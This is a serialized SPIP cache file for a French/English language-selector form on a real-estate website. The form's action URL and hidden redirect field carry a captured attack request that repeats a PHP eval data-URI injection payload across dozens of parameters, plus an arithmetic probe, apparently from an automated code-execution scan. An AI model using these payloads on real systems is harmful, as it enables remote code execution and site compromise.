a:11:{s:5:"texte";s:4944:"<div class="formulaire_spip formulaire_menu_lang" id="formulaire_menu_lang">
	<form method="post" action="http://www.realestatecaretaking.com/spip.php?action=converser&amp;redirect=.%2F%3Fpage%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26dir%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26file%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26asc%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26inc%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26e%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26code%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26q%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26w%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26e%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26r%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26t%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26y%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26u%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26i%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26o%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26p%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26a%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26s%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26d%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26f%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26g%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26h%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26j%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26k%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26l%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26z%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26x%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26c%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26v%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26b%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26n%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26m%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26a%3Dprint-439573653%2A57%3B"><div>
		<input name="action" value="converser" type="hidden" />
<input name="redirect" value="./?page=data:,%3C&amp;php%20eval($_GET[a]);%20&amp;%3E&amp;dir=data:,%3C&amp;php%20eval($_GET[a]);%20&amp;%3E&amp;file=data:,%3C&amp;php%20eval($_GET[a]);%20&amp;%3E&amp;asc=data:,%3C&amp;php%20eval($_GET[a]);%20&amp;%3E&amp;inc=data:,%3C&amp;php%20eval($_GET[a]);%20&amp;%3E&amp;e=data:,%3C&amp;php%20eval($_GET[a]);%20&amp;%3E&amp;code=data:,%3C&amp;php%20eval($_GET[a]);%20&amp;%3E&amp;q=data:,%3C&amp;php%20eval($_GET[a]);%20&amp;%3E&amp;w=data:,%3C&amp;php%20eval($_GET[a]);%20&amp;%3E&amp;e=data:,%3C&amp;php%20eval($_GET[a]);%20&amp;%3E&amp;r=data:,%3C&amp;php%20eval($_GET[a]);%20&amp;%3E&amp;t=data:,%3C&amp;php%20eval($_GET[a]);%20&amp;%3E&amp;y=data:,%3C&amp;php%20eval($_GET[a]);%20&amp;%3E&amp;u=data:,%3C&amp;php%20eval($_GET[a]);%20&amp;%3E&amp;i=data:,%3C&amp;php%20eval($_GET[a]);%20&amp;%3E&amp;o=data:,%3C&amp;php%20eval($_GET[a]);%20&amp;%3E&amp;p=data:,%3C&amp;php%20eval($_GET[a]);%20&amp;%3E&amp;a=data:,%3C&amp;php%20eval($_GET[a]);%20&amp;%3E&amp;s=data:,%3C&amp;php%20eval($_GET[a]);%20&amp;%3E&amp;d=data:,%3C&amp;php%20eval($_GET[a]);%20&amp;%3E&amp;f=data:,%3C&amp;php%20eval($_GET[a]);%20&amp;%3E&amp;g=data:,%3C&amp;php%20eval($_GET[a]);%20&amp;%3E&amp;h=data:,%3C&amp;php%20eval($_GET[a]);%20&amp;%3E&amp;j=data:,%3C&amp;php%20eval($_GET[a]);%20&amp;%3E&amp;k=data:,%3C&amp;php%20eval($_GET[a]);%20&amp;%3E&amp;l=data:,%3C&amp;php%20eval($_GET[a]);%20&amp;%3E&amp;z=data:,%3C&amp;php%20eval($_GET[a]);%20&amp;%3E&amp;x=data:,%3C&amp;php%20eval($_GET[a]);%20&amp;%3E&amp;c=data:,%3C&amp;php%20eval($_GET[a]);%20&amp;%3E&amp;v=data:,%3C&amp;php%20eval($_GET[a]);%20&amp;%3E&amp;b=data:,%3C&amp;php%20eval($_GET[a]);%20&amp;%3E&amp;n=data:,%3C&amp;php%20eval($_GET[a]);%20&amp;%3E&amp;m=data:,%3C&amp;php%20eval($_GET[a]);%20&amp;%3E&amp;a=print-439573653*57;" type="hidden" />
		<label for="var_lang">Langues du site</label>
		<select name="var_lang" id="var_lang" onchange="this.parentNode.parentNode.submit()"><option class='maj-debut' value='en'>English</option>
<option class='maj-debut' value='fr' selected='selected'>fran&#231;ais</option>
</select>
		<noscript><p class="boutons"><input type="submit" class="submit" value="&gt;&gt;" /></p></noscript>
	</div></form>
</div>";s:9:"squelette";s:37:"html_8cd070bd2532ece23938dec9302dec97";s:6:"source";s:32:"prive/formulaires/menu_lang.html";s:11:"process_ins";s:4:"html";s:11:"invalideurs";a:1:{s:5:"cache";s:35:"9/for-lan-var-lan-htt-GET--72337ebb";}s:7:"entetes";a:1:{s:12:"X-Spip-Cache";i:3600;}s:5:"duree";i:0;s:5:"notes";s:0:"";s:8:"contexte";a:8:{s:3:"nom";s:8:"var_lang";s:3:"url";s:2529:"http://www.realestatecaretaking.com/spip.php?action=converser&redirect=.%2F%3Fpage%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26dir%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26file%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26asc%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26inc%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26e%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26code%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26q%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26w%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26e%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26r%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26t%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26y%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26u%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26i%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26o%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26p%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26a%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26s%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26d%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26f%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26g%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26h%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26j%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26k%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26l%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26z%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26x%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26c%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26v%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26b%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26n%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26m%3Ddata%3A%2C%253C%26php%2520eval%28%24_GET%5Ba%5D%29%3B%2520%26%253E%26a%3Dprint-439573653%2A57%3B";s:7:"langues";s:134:"<option class='maj-debut' value='en'>English</option>
<option class='maj-debut' value='fr' selected='selected'>fran&#231;ais</option>
";s:4:"lang";s:2:"fr";s:4:"date";s:19:"2016-01-24 18:24:03";s:12:"date_default";b:1;s:10:"date_redac";s:19:"2016-01-24 18:24:03";s:18:"date_redac_default";b:1;}s:12:"lastmodified";i:1453656243;s:2:"gz";b:0;}